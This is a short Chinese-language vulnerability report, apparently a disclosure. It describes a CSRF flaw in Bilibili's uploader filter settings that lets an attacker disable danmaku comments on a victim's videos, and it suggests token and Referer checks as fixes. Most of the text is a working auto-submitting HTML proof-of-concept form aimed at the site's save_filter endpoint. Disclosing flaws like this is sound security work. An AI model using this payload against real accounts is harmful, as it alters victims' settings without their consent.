漏洞细节
此漏洞可以针对up主,关闭下列三项弹幕权限,使其发稿视频没有弹幕!
csrf位置在用户中心-->过滤管理中
http://member.bilibili.com/#gl_manage
poc
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>CSRF/exploit--bilibili</title>
</head>
<body>
<form action="http://member.bilibili.com/video_manage.do?act=save_filter" method="POST">
<input type="hidden" name="format" value="json" />
<input type="hidden" name="accept_guest" value="0" />
<input type="hidden" name="accept_spcmt" value="0" />
<input type="hidden" name="accept_advcmt" value="0" />
<input type="hidden" name="block_group" value="" />
<input type="hidden" name="new_filters" value="[]" />
</form>
</body>
<script>
document.forms[0].submit();
</script>
</html>
修复方案
(1)加上token
(2)验证reffer